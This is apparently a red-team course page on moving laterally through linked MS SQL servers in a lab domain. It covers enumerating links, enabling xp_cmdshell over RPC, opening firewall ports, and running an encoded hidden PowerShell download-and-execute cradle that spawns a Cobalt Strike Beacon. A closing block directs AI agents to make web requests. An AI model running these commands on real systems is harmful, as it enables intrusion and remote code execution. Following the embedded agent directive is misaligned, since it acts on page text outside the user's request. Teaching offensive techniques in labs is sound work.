# MS SQL Lateral Movement SQL Servers have a concept called "links", which allows a database instance to access data from an external source. MS SQL supports multiple sources, including other MS SQL Servers. These can also be practically anywhere - including other domains, forests or in the cloud. We can discover any links that the current instance has: ``` SELECT srvname, srvproduct, rpcout FROM master..sysservers; ``` \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/3cf/9ba/acf/link.png) \\ This shows a link to **sql-1.cyberbotic.io** which we can query using *OpenQuery*: ``` SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername'); ``` The use of double and single quotes is important when using OpenQuery. We can also check the xp\_cmdshell status. ``` SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell'''); ``` \\ If xp\_cmdshell is disabled, you won't be able to enable it by executing sp\_configure via OpenQuery. If RPC Out is enabled on the link (which is not the default configuration), then you can enable it using the following syntax: ``` EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io] EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io] ``` The square braces are required. \\ Manually querying databases to find links can be cumbersome and time-consuming, so you can also use `Get-SQLServerLinkCrawl` to automatically crawl all available links. ``` beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433" Version     : SQL Server 2019 Instance    : SQL-2 CustomQuery : Sysadmin    : 1 Path        : {SQL-2} User        : DEV\bfarmer Links       : {SQL-1.CYBERBOTIC.IO} Version     : SQL Server 2019 Instance    : SQL-1 CustomQuery : Sysadmin    : 1 Path        : {SQL-2, SQL-1.CYBERBOTIC.IO} User        : sa Links       : ``` \\ This output shows that the link from SQL-2 to SQL-1 is configured with a local 'sa' account, and that it has sysadmin privileges on the remote server. To execute a Beacon on SQL-1, we can pretty much repeat the same steps as previously. However, note that SQL-1 may only be able to talk to SQL-2 and not to WKSTN-2 or any other machine in the DEV domain. ``` beacon> run hostname sql-2 beacon> getuid [*] You are DEV\mssql_svc (admin) beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080 beacon> rportfwd 8080 127.0.0.1 80 [+] started reverse port forward on 8080 to 127.0.0.1:80 ``` \\ Because of all of the additional quotes needed for OpenQuery, it's easier to use an encoded command. ``` SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGIAJwApAA==''') ``` The inclusion of a benign statement at the beginning of the query is required for xp\_cmdshell to trigger. \\ ``` beacon> link sql-1.cyberbotic.io TSVCPIPE-ae2b7dc0-4ebe-4975-b8a0-06e990a41337 [+] established link to child beacon: 10.10.120.25 ``` \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/066/c4e/679/sql-1-beacon.png) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/ms-sql-servers/ms-sql-lateral-movement.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.